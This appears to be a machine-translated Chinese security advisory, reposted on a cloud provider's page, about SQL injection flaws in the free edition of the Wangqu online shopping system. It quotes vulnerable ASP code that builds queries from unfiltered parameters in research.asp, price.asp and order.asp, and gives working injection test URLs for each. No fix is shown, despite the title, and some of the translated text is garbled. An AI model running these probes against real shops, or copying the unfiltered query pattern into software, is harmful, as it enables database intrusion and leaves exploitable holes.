SQL Injection and repair of Wangqu Online Shopping System flagship edition (Free Version)

Source: Internet
Author: User

Version: flagship version of Online Shopping System of Wangqu (Free Version)
 
Download: http://www.cnhww.com/down.asp? Id = 6
 
----------------------------------------------------------------------
 
Article 1:
 
/Research. asp
 
Selectname is not filtered, resulting in search injection.
 
Code:
 
Lines 7-12
 
Dim action, searchkey, anclassid, jiage, selectname
Anclassid = request ("anclassid ")
Searchkey = request ("searchkey ")
Jiage = request ("jiage ")
Action = request ("action ")
Selectname = request ("selectname") // obtain selectname. No rows 212-230 are filtered in the middle.
 
If anclassid <> 0 then
Select case action
Case "1"
Sql1 = "bookname like '%" & searchkey & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
Case "2"
Sql1 = "pingpai like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
Case "3"
Sql1 = "bookcontent like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
End select
Else
Select case action
Case "1"
Sql1 = "bookname like '%" & searchkey & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &")"
Case "2"
Sql1 = "pingpai like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") "// here I am using
Case "3"
Sql1 = "bookcontent like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &")"
End select
End if234 rows
 
Rs. open "select * from products where" & sql1 & "and zhuangtai = 0 order by adddate desc", conn, 1, 1:
 
Http://www.2cto.com/research. asp? Anclassid = 0 & action = 2 & jiage = 100000 & selectname = Beijing run % 'and 1 = 1 and' % '='
 
--------------------------------------------------------------------
 
Second:
 
/Price. asp
 
No filtering is performed on anid, resulting in Digital Injection.
 
Code:
 
74 rows:
 
Anid = trim (request ("anid") // obtain anid without any filtering in the middle of 104 rows:
 
If anid <> "then
Rs. open "select * from products where anclassid =" & anid & "order by adddate desc", conn, 1, 1:
 
Http: // MAID: 8080/price. asp? Anid = 62 and 1 = 1
 
---------------------------------------------------------------------
 
Third:
 
/Order. asp
 
Dan is not filtered, resulting in injection of the struct type.
 
Code:
 
64 rows:
 
Dingdan = request. QueryString ("dan") // get dan. There is no filtering among 66 rows:
 
Rs. open "select
Products. bookid, products. shjiaid, products. bookname, products. shichangjia, products. huiyuanjia, orders. actiondate, orders. shousex,
Orders. danjia, orders. feiyong, orders. fapiao, orders. userzhenshiname, orders. shouhuoname, orders. dingdan, orders. youbian, orders. liu
Yan, orders. zhifufangshi, orders. songhuofangshi, orders. zhuangtai, orders. zonger, orders. useremail, orders. usertel, orders. shouhuodi
Zhi, orders. bookcount from products inner join orders on products. bookid = orders. bookid where
Orders. username = '"& request. cookies (" Cnhww ") (" username ") &"' and dingdan = '"& dingdan &"' ", conn, 1, 1 structure:
 
The next order is placed first, and cannot be used by others
 
Http: // 127.0.0.1: 8080/order. asp? Dan = 201277143453 'and '1' = '1
 
----------------------------------------------------------------------
 
Article 4:
 
/My_msg.asp
 
No delid filtering is performed (I use the free version and cannot test it, but this vulnerability is very likely to exist)
 
----------------------------------------------------------------------
 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.